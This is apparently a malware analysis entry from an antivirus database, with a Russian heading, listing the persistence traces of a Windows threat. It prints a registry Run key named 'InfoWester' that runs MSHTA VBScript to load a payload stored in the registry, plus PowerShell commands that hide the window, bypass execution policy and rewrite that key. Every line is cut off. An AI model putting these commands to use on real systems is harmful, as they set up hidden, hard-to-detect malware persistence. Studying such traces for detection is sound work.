Техническая информация
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'InfoWester' = 'MSHTA VbScript:Execute("CreateObject(""Wscript.Shell"").Run CreateObject(""Wscript.Shell"").RegRead(""HKCU\Software\Payloa...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Start-Sleep -s 15; Remove-ItemProperty -Path 'HKCU:\SOFTWARE' -Name 'InfoWester';New-ItemProperty -Path 'HKCU:\SOFTWARE' -Name 'InfoWester' -Value '"powershell -executionpolicy bypass -windowst...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Start-Sleep -s 15; Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'InfoWester';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run...